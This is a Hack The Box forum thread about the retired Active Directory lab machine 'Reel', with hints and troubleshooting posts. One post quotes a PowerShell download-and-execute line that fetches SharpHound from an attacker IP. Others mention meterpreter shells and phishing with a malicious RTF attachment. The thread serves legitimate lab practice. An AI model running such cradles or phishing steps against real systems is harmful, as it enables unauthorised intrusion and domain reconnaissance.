Reel

init foothold: im trying to send a file based on the tips on the machine to an user but i dont get anything back is this the intended way?

I am soooooo close on this. I can see the file I want, but I can’t open it, copy it, move it or change it’s properties… What am I missing?

Edit: Nevermind! I’m a fool. I need to slow down and read a little more carefully.

Got root! Great box!

powershell issue is solved by issuing “powershell -c -” in meterpreter > shell

Awesome machine.
Incredibly realistic too.

Where to start? Downloaded some files and whats the next step? PM plz
Hack The Box

Got root! If you want to learn a lot about windows AD PrivEsc this is your machine!

Very sad to see that this box is retiring this weekend.

This system is an crazy walk down AD road. Learned loads.

<<< redacted - rooted!!! >>>

@rireoubli said:
Yay, finally got root on this one as well! It was a very good one, thanks to the creator.

And I’d like to share the hint that made it for me when I was stuck for so long: login-logout might help you

Thank you, thank you, thank you.

<<< redacted - rooted!!! >>>

@evandrix said:
stuck on reel @ user c****e, what next?

  1. need to re-run “dog” tool, or output already there is sufficient to PE?
  2. PE to local admin sufficient, or must be da?
  3. maybe my ps1 syntax is wrong, if someone can help (in a pm probably), that would be great

You dont need to re-run anything. The document you have is enough.

This is a useful read: https://wald0.com/?p=112

<<< redacted - rooted!!! >>>

@evandrix said:
yep, i’ve read through that.
it seems like the “document you have” != the output of my live ps1 queries via p****v**w

Possibly, but if you’ve logged in as the user C*, did you enumerate the user T* account first?

Rooted thanks to a hint to stop being a dummy . I’m sad to see this one go into retirement.

This was a great box and representative of cracking the perimeter into a real world environment. I definitely added some cool techniques and tools into my arsenal thanks to this challenge.

<<< redacted - rooted!!! >>>

<<< redacted - rooted!!! >>>

@whipped said:

@rireoubli said:
Yay, finally got root on this one as well! It was a very good one, thanks to the creator.

And I’d like to share the hint that made it for me when I was stuck for so long: login-logout might help you

Thank you, thank you, thank you.

Thank you, thank you, thank you,Thank you, thank you, thank you.

hey all,
I know that this machine is old and just for the sake of education

I have reached the part where i download SharpHound.ps1 on victim using
IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.5/SharpHound.ps1’)

Then when i
Invoke-BloodHound -CollectionMethod All

the shell hangs and nothing happens

any help on what may be causing the problem

Hi, were you able to resolve this? I am using sendemail, it works fine for sending non rtf files that are about 67 bytes, but the generated rtf file is 5-6 KB, and email server only sends acknowledgement TCP packet to the first segment of the msg and never to the rest, that’s why sending this attachment fails. Tried other email clients with same behavior. Looks like either a network or email server size limitation issue. Anyone had any luck recently?